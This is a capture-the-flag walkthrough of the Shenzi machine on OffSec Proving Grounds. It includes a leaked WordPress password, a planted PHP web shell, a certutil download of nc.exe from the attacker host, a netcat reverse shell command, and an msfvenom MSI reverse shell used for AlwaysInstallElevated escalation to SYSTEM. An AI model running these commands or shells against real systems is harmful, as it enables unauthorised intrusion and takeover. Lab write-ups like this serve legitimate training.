Shenzi
Writeup for Shenzi from offsec Proving Grounds
Information Gathering
sudo ./nmapAutomator.sh 192.168.85.55 all
Service Enumeration
SMB (Port 445)
We can list what to see what Sharenames there are.
We can then download all the files to see if there are anything useful.
Passwords.txt contains many credentials which we can save for later.
Notice that there are WordPress credentials. We can thus run gobuster
on the webserver to see if there are any interesting directories.
HTTP (Port 80)
It looks like a basic XAMPP server.
We can run gobuster
.
There is a phpmyadmin
directory but we can't really access it.
After more digging and clever brute-forcing, I tried /Shenzi
directory and we get this page.
Since we know this is a WordPress site, we can try the /wp-admin/ directory and we get this login page.
From our earlier enumeration of SMB service, we know that the login credentials are admin:FeltHeadwallWight357
. We try using these credentials, and we are authenticated.
Exploit
Here, we can navigate toTheme Editor
under the Appearance
tab. In this tab, we are able to modify PHP code.
We copy and paste the source code from here, https://github.com/artyuum/Simple-PHP-Web-Shell/blob/master/index.php, to the 404.php
file. This would allow us to have access to a web shell whenever we get a 404 error on this site, or if we navigate to 404.php
.
Then, we navigate to /404.php
or any other directory that doesn't exist, and we get our web shell.
Next, let's transfer nc.exe
to the target machine so that we can use it to gain a reverse shell.
cmd.exe /c certutil -urlcache -split -f http://192.168.49.85:80/opt/windows_nc/nc.exe nc.exe
Next, let's get a reverse shell.
We use the following command in our PHP Web Shell:
nc.exe -e cmd 192.168.49.85 443
Privesc
Next, we can transfer winPEAS onto the target machine and run it.
From winPEAS, we notice these 2 registers are enabled (value is 0x1). This means users of any privilege can install (execute) *.msi
files as NT AUTHORITY\SYSTEM.
Credits - https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated
Let's generate a .msi
reverse shell file first.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.85 LPORT=21 -f msi > ~/pg/shenzi/shell.msi
After transferring the file and running it, we get SYSTEM.
Last updated